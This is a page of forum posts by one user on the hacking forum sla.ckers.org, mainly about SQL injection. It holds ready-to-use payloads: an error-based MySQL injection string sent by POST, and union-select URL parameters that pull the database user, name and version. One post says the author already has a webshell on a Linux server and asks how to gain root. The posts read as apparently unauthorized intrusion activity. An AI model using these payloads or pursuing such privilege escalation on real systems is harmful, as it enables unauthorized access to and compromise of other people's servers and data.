Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 

Current Page: 1 of 1
Results 1 - 6 of 6
2 years ago
DebugZer0
this url can be injected with post method. payload: id=3 AND (SELECT 6108 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,110,58),(SELECT (CASE WHEN (6108=6108) THEN 1 ELSE 0 END)),CHAR(58,117,100,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) id=3 AND (SELECT 6108 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,110,58),(SELECT (CASE WHEN (6108=6108) THEN 1 ELSE 0 END)),CHAR(5
Forum: SQL and Code Injection
2 years ago
DebugZer0
no,it doesn`t work.seems this server has been patched very well. i tried all exploits that i can find but still cannt root it.
Forum: OMG Ponies
2 years ago
DebugZer0
hello guys,there is a server and I`ve already got the webshell,the os is linux and kernel version is 2.6.18-92 and i have tried all the exploits on internet but cannt get root of it,any ideas ?
Forum: OMG Ponies
2 years ago
DebugZer0
any download url?
Forum: Projects
2 years ago
DebugZer0
well,as you can use the GET method to inject it,why not use a auto tool?like sqlmap or sth else...
Forum: SQL and Code Injection
2 years ago
DebugZer0
the variables $passkey and $usernamepass are not filtered well.a hacker can use sql command to get the data what he wants. like that: attack1.php?pass=1+order+by+NUM attack1.php?pass=1+and+8=-2+union+select+concat_ws(0x3a,user(),database(),version())/* also you can do the same thing with $username,both of them are unsecurity.
Forum: SQL and Code Injection
Current Page: 1 of 1